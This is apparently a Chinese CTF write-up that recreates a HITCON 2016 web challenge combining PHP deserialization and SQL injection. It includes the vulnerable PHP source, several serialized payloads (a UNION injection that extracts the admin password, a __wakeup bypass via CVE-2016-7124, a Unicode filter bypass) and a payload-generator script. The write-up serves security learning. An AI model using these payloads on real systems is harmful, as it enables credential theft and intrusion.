2. 程式人生 > >還原HITCON 2016一道web題(php反序列化漏洞)

還原HITCON 2016一道web題(php反序列化漏洞)

阿新 發佈:2019-02-01

實驗環境搭建:PHPstudy,火狐(backbar),notepad++;

本人在還原此題目時,因為mysql資料庫使用者名稱密碼和方便除錯等原因對原始碼的一些引數做了一些相應的改動,但是沒有改變主要程式碼。

config.php:

<?php
$db_host = '127.0.0.1';
$db_name = 'Test';
$db_user = 'root';
$db_pass = 'sa123123';

$DEBUG = @$_GET['get'];
$FLAG = "HITCON{php 4nd mysq1 are s0 mag1c, isn't it?}";
?>

ctf-php-unserialize.php:(這個名字可以隨便起,自己開心就好)

<?php

include "config.php";

class HITCON{
    private $method;
    private $args;
    private $conn;

    public function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;

        $this->__conn();
    }

    function show() {
        list($username) = func_get_args();
        $sql = sprintf("SELECT * FROM users WHERE username='%s'", $username);

        $obj = $this->__query($sql);
        if ( $obj != false  ) {
            $this->__die( sprintf("%s is %s", $obj->username, $obj->role) );
        } else {
            $this->__die("Nobody Nobody But You!");
        }
        
    }

    function login() {
        global $FLAG;
        list($username, $password) = func_get_args();
        $username = strtolower(trim(mysql_escape_string($username)));
        $password = strtolower(trim(mysql_escape_string($password)));

        $sql = sprintf("SELECT * FROM users WHERE username='%s' AND password='%s'", $username, $password);
        if ( $username == 'orange' || stripos($sql, 'orange') != false ) {                //特殊字元Ã繞過;
            $this->__die("Orange is so shy. He do not want to see you.");
        }

        $obj = $this->__query($sql);
        if ( $obj != false && $obj->role == 'admin'  ) {
            $this->__die("Hi, Orange! Here is your flag: " . $FLAG);
        } else {
            $this->__die("Admin only!");
        }
    }

    function source() {
        highlight_file(__FILE__);
    }

    function __conn() {
        global $db_host, $db_name, $db_user, $db_pass, $DEBUG;

        if (!$this->conn)
            $this->conn = mysql_connect($db_host, $db_user, $db_pass);
        mysql_select_db($db_name, $this->conn);

        if ($DEBUG) {
            $sql = "CREATE TABLE IF NOT EXISTS users ( 
                        username VARCHAR(64), 
                        password VARCHAR(64), 
                        role VARCHAR(64)
                    ) CHARACTER SET utf8";
            $this->__query($sql, $back=false);

            $sql = "INSERT INTO users VALUES ('orange', '$db_pass', 'admin'), ('phddaa', 'ddaa', 'user')";
            $this->__query($sql, $back=false);
        } 

        mysql_query("SET names utf8");                          //使用utf8編碼方式
        mysql_query("SET sql_mode = 'strict_all_tables'");
    }

    function __query($sql, $back=true) {
        $result = @mysql_query($sql);
        if ($back) {
            return @mysql_fetch_object($result);
        }
    }

    function __die($msg) {
        $this->__close();

        header("Content-Type: application/json");
        die( json_encode( array("msg"=> $msg) ) );
    }

    function __close() {
        mysql_close($this->conn);
    }

    function __destruct() {
        $this->__conn();             //將資料寫入資料庫;

        if (in_array($this->method, array("show", "login", "source"))) {
            @call_user_func_array(array($this, $this->method), $this->args);
        } else {
            $this->__die("What do you do?");
        }

        $this->__close();
    }

    function __wakeup() {
        foreach($this->args as $k => $v) {
            $this->args[$k] = strtolower(trim(mysql_escape_string($v)));
        }
    }
}

if(isset($_GET["data"])) {                        //偵測有無data的get獲取;
    @unserialize($_GET["data"]);                  //跳過 __wakeup()函式;呼叫解構函式
} else {
    new HITCON("source", array());
}
?>

環境搭建完成後執行:

通過審計原始碼可以看出需要兩個get資料:get,data;

當get為真可以將資料寫入資料庫,data需要構造序列化資料來獲取flag;

第一個構造(mysql資料庫注入獲取orange使用者的資料庫密碼):

O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:79:"bla' union select password,username,role from users where username='orange' -- ";}}

第二個構造(使用第一個構造獲取的密碼獲拿到flag):

O:6:"HITCON":4:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:7:"orÃnge";i:1;s:8:"sa123123";}}

主要的點:

1.當字串為private型別時,序列化時生成的序列化字串中類名前後會有0×00,url編碼下為%00。如果不加的話,會得到結果{"msg":"What do you do?"}。

2.類中有魔術方法__wakeup,其中函式會對我們的輸入進行過濾、轉義。所以需要利用谷歌發現的CVE-2016-7124漏洞(當序列化字串中,如果表示物件屬性個數的值大於真實的屬性個數時就會跳過__wakeup的執行,參考官方文件:https://bugs.php.net/bug.php?id=72663)。

O:6:"HITCON":2:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:79:"bla' union select password,username,role from users where username='orange' -- ";}}

如果這樣注入就不能跳過__wakeup()函式,會得到結果{"msg":"Nobody Nobody But You!"};

3.在解構函式中有一個判斷 if (in_array($this->method, array("show", "login", "source")))如果method不是裡面的資料就會導致被過濾。

O:6:"HITCON":4:{s:14:"%00HITCON%00method";s:3:"abc";s:12:"%00HITCON%00args";a:1:{i:0;s:79:"bla' union select password,username,role from users where username='orange' -- ";}}

如果這樣注入會得到結果:{"msg":"What do you do?"};

4. 在login()函式中有判斷if ( $username == 'orange' || stripos($sql, 'orange') != false )如果username=orange時就會被過濾,此處可以利用的字母Ą、Ã,實現繞過,注意 s:6:"orAnge" ,改為s:7:"orÃnge"。

O:6:"HITCON":4:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:6:"orange";i:1;s:8:"sa123123";}}

如果這樣注入會得到結果:{"msg":"Orange is so shy. He do not want to see you."};

序列化怎麼快速構造出來?看完上面的部分在看這個生成序列化的利用指令碼應該很簡單了:

<?php

class HITCON{
    private $method;
    private $args;

    public function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;

    }
}

	$_method="show";
	$_args=array("bla' union select password,username,role from users where username='orange' -- ");
	$Instantiation=new HITCON($_method,$_args);
	echo serialize($Instantiation)."</br>";
	$Instantiation=null;
	
	
	$_method="login";
	$_args=array("orÃnge","sa123123");
	$Instantiation=new HITCON($_method,$_args);
	echo serialize($Instantiation)."</br>";
	$Instantiation=null;
?>

注:剛開始使用了IE瀏覽器,結果在特殊字元繞過的時候,連線資料庫查詢的時候總是得不到flag一直得到{"msg":"Admin only!"};但是使用火狐就沒有這個問題,還有考慮到火狐有hackbar外掛,進行get注入時方便不少。

相關推薦

還原HITCON 2016一道webphp序列漏洞

實驗環境搭建:PHPstudy,火狐(backbar),notepad++; 本人在還原此題目時,因為mysql資料庫使用者名稱密碼和方便除錯等原因對原始碼的一些引數做了一些相應的改動,但是沒有改變主要程式碼。 config.php: <?php $db_ho

一道ctf看php序列漏洞的應用場景

目錄 0x00 first 0x01 我打我自己之---序列化問題 0x02 [0CTF 2016] piapiapia 0x00 first 前幾天joomla爆出個反序列化漏洞,原因是因為對

php序列漏洞繞過魔術方法 __wakeup

prot poc cte enc repo private 成員 .html blank 0x01 前言 前天學校的ctf比賽,有一道題是關於php反序列化漏洞繞過wakeup,最後跟著大佬們學到了一波姿勢。。 0x02 原理 序列化與反序列化簡單介紹 序列化:把復雜的數據

PHP序列漏洞學習

exc tof target fun 反序 ring 內容 style 字符串 serialize:序列化 unserialize: 反序列化 簡單解釋: serialize 把一個對象轉成字符串形式, 可以用於保存 unserialize 把serialize序列化後的字

PHP序列漏洞

發生 arc arr 再看 記錄 php7 數據化 tostring 又能 聊一聊PHP反序列化漏洞 2016年11月4日 反序列化漏洞在各種語言中都較為常見,下面就簡單聊一聊PHP的反序列化漏洞(PHP對象註入)。第一次了解這個洞還是在某次ctf上,就簡單記錄下個人理解

ref:PHP序列漏洞成因及漏洞挖掘技巧與案例

tmp 問題 文章 extend === 代碼 簡單的 ted IE ref:https://www.anquanke.com/post/id/84922 PHP反序列化漏洞成因及漏洞挖掘技巧與案例 一、序列化和反序列化 序列化和反序列化的目的是使得程序間傳輸對象會更加方

應急響應--記錄一次漏洞緊急處理中意外發現的挖礦木馬Shiro序列漏洞和ddg挖礦木馬

var vpc hist crontab 使用 8.4 wget 序列化 coo 背景 某公司線上服務器意外發現一個Apache Shiro 反序列化漏洞,可以直接GetShell。出於做安全的謹慎,馬上出現場應急,確認漏洞。該漏洞存在在cookie字段中的remembe

四個例項遞進php序列漏洞理解

索引 最近在總結php序列化相關的知識,看了好多前輩師傅的文章,決定對四個理解難度遞進的序列化思路進行一個復現剖析。包括最近Blackhat議題披露的phar拓展php反序列化漏洞攻擊面。前人栽樹,後人乘涼,擔著前輩師傅們的輔拓前行! D0g3 為了讓大

由Typecho 深入理解PHP序列漏洞

前言 Typecho是一個輕量版的部落格系統,前段時間爆出getshell漏洞,網上也已經有相關的漏洞分析釋出。這個漏洞是由PHP反序列化漏洞造成的,所以這裡我們分析一下這個漏洞,並藉此漏洞深入理解PHP反序列化漏洞。 一、 PHP反序列化漏洞 1.1 漏洞簡介 PH

理解php序列漏洞

php物件注入是一個非常常見的漏洞,這個型別的漏洞雖然有些難以利用,但仍舊非常危險。為了理解這個漏洞,請讀者具備基礎的php知識。類和變數是非常容易理解的php概念。舉個例子,1.php在一個類中定義了一個變數和一個方法。它建立了一個物件並且呼叫了PrintVariable

淺談PHP序列漏洞原理

序列化與反序列化 序列化用途:方便於物件在網路中的傳輸和儲存 0x01 php反序列化漏洞 在PHP應用中,序列化和反序列化一般用做快取,比如session快取,cookie等。 常見的序列化格式: 二進位制格式 位元組陣列 json字串 xml字串 序列化就是將物件轉換為流,利於儲存和傳輸的格式

PHP序列漏洞總結

寫在前邊   做了不少PHP反序列化的題了,是時候把坑給填上了。參考了一些大佬們的部落格,自己再做一下總結 1.面向物件2.PHP序列化和反序列化3.PHP反序列化漏洞例項 1.面向物件   在瞭解序列化和反序列化之前,先簡單瞭解一下PHP的面向物件。   萬物皆可物件。根據官方手冊,PHP中,以關鍵

PHP 序列漏洞入門學習筆記

## 參考文章: [PHP反序列化漏洞入門](https://www.freebuf.com/articles/web/221213.html) [easy_serialize_php wp](https://blog.csdn.net/qq_43622442/article/details/10600369

解網鼎杯一道webwafUpload

思路:burpsuite擷取post資料包,上傳木馬,菜刀連線。 擷取上傳的資料包,對filename引數使用陣列繞過,上傳php.php,同時得到php.php路徑。 附: PHP一句話木馬

一道PHP偽協議&PHP序列綜合運用的CTF

首先拿到題目後,毫無疑問,檢視一下原始碼 <!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if

Apache Shiro 1.2.4序列漏洞CVE-2016-4437復現

# Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)復現 ## 環境搭建 ``` docker pull medicean/vulapps:s_shiro_1 docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1

php 序列返回false解決方法

反序 blog $2 序列化 nbsp post 序列 php replace function mb_unserialize($serial_str) { $serial_str= preg_replace(‘!s:(\d+):"(.*?)";

5. 通過PHP序列進行遠程代碼執行

ror 資料 sset 相同 var long abstract 應該 打破 通過PHP反序列化進行遠程代碼執行 0×00 前言 在NotSoSecure,我們每日都會進行滲透測試或代碼審查,不過最近我們遇到了一段有趣的PHP代碼,它可能會導致遠程代碼執行(RCE)漏洞

南郵PHP序列

this foo new fun color echo ati serial 文章 題目如下: <?php class just4fun { var $enter; var $secret; } if (isset($_GET[‘pass‘]))

第九屆極客大挑戰——怎麼又是江師傅的祕密java序列

引言:因為太想加入三葉草了,所以極客大挑戰這段時間一直在努力的學習,原來還真沒想到能在比賽中拿到排行榜第一的成績,不過現在看來努力始終都是有回報的。但我依然還是比較菜啊-.-,最近卻有很多夥伴加我好友,一來就叫我大佬,讓我深感有愧-.-,既然都想看我wp,那我就挑幾道題寫寫好了,口拙詞劣還望見諒。